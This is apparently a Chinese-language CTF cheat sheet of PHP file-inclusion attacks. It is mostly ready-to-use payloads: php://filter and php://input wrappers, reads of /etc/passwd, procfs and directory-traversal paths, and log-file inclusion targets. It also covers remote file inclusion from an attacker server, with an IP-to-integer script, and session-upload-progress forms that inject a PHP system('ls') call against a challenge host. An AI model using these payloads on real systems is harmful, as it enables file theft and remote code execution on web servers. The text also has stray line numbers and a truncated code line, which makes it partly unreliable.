php伪协议

file://文件路径:例, 1.win:file://C:/flag 2.file:///etc/passwd

php://filter:例,php://filter/[可选的过滤器链]/resource=<要过滤的数据流>

1
2
3
4
5
6
7
8
9
base64编码:php://filter/read=convert.base64-encode/resource=flag.php

rot13加密:php://filter/read=string.rot13/resource=flag.php

将UTF-8转成UTF-16:php://filter/read=convert.iconv.UTF-8.UTF-16/resource=flag.php
file_get_content 
大写输出:php://filter/read=string.toupper/resource=flag.php

小写输出:php://filter/read=string.tolower/resource=flag.php

php://input:需配合POST,POST传输内容,如<?php phpinfo();?>

1
2
3
4
5
data://:可将数据嵌入url中			data://[<mediatype>][;base64],<data>

    mediatype:数据类型(如text/plain、image/png),可选参数 默认text
    base64:若数据需Base64编码,则添加此标记
    data:实际数据内容

利用 procfs 找源码路径

在linux中

  • /proc/self/root:当前进程看到的根目录

  • /proc/self/cwd:当前进程工作目录

    这类题常见思路是,把这两个路径和 ../ 组合起来,去撞源码、配置和相邻目录

    1
    ../../proc/self/root/proc/self/cwd/../api/preview.php

目录穿越

1.?file=../../../../../../../../flag

2.?file=source.php?../../../../flag

日志包含

nginx默认日志:1.访问日志/var/log/nginx/access.log

​ 2.错误日志/var/log/nginx/error.log

​ 记录每次请求user-agent报文

apache日志默认:/var/log/apache/access.log

​ apache日志文件存放着我们输入的url参数

ssh默认日志:/var/log/auth.log

远程文件包含

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
include"http://服务器IP/test"		//要求靶场网站服务器php.ini中allow_url_include=On
服务器IP可以用常规IP地址,也可以用长整型IP,如include"http://2130706433/test"

import sys
#IP转换为长整型                          
def ip2long(ip):                         
    ip_list = ip.split('.')              
    result = 0                           
    for i in range(4):                   
        result+=int(ip_list[i])*256**(3-i
    return result                        
                                         
#长整型转换为IP                          
def long2ip(long):                       
    floor_list = []                      
    num = long                           
    for i in reversed(range(4)):         
        res = divmod(num,256**i)         
        floor_list.append(str(res[0]))   
        num = res[1]                     
    return '.'.join(floor_list)          
ip = sys.argv[1]                         
long_=ip2long(ip)                        
print("长整型IP:",long_)                 
print("IP:",long2ip(long_))
                                      
测试:python ip2long.py 127.0.0.1
输出:
长整型IP: 2130706433
IP: 127.0.0.1

临时文件包含

通常结合条件竞争

<!DOCTYPE html>
<html>
<body>

<form action=”https://fdd731f2-8694-45ab-abc8-870b3a15af69.challenge.ctf.show/“ method=”POST” enctype=”multipart/form-data”>
<input type=”file” name=”file” />
<input type=”submit” value=”submit” />
</form>

</body>
</html>

multipart/form-data编码用于传输文件

SESSION临时文件包含

1
2
3
4
5
6
7
8
9
10
11
12
13
<!DOCTYPE html>
<html>
<body>
<form action="https://fdd731f2-8694-45ab-abc8-870b3a15af69.challenge.ctf.show/" method="POST" enctype="multipart/form-data">
<input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="<?php system('ls'); ?>" />
<input type="file" name="file" />
<input type="submit" value="submit" />
</form>
</body>
</html>
<?php
session_start();
?>
1
2
3
4
5
6
7
8
9
10
11
12
13
<!DOCTYPE html>
<html>
<body>
<form action="https://xxx/" method="POST" enctype="multipart/form-data">
<input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="<?php system('ls');?>" />
<input type="file" name="file" />
<input type="submit" value="submit" />
</form>
</body>
</html>
<?php
session_start();
?>

要实现session文件上传,需要POST+multipart/form-data+PHP_SESSION_UPLOAD_PROGRESS

上传时要在Cookie请求头中加上PHPSESSID=<name>,会固定生成一个sess_<name>文件,路径为/tmp/sess_<name>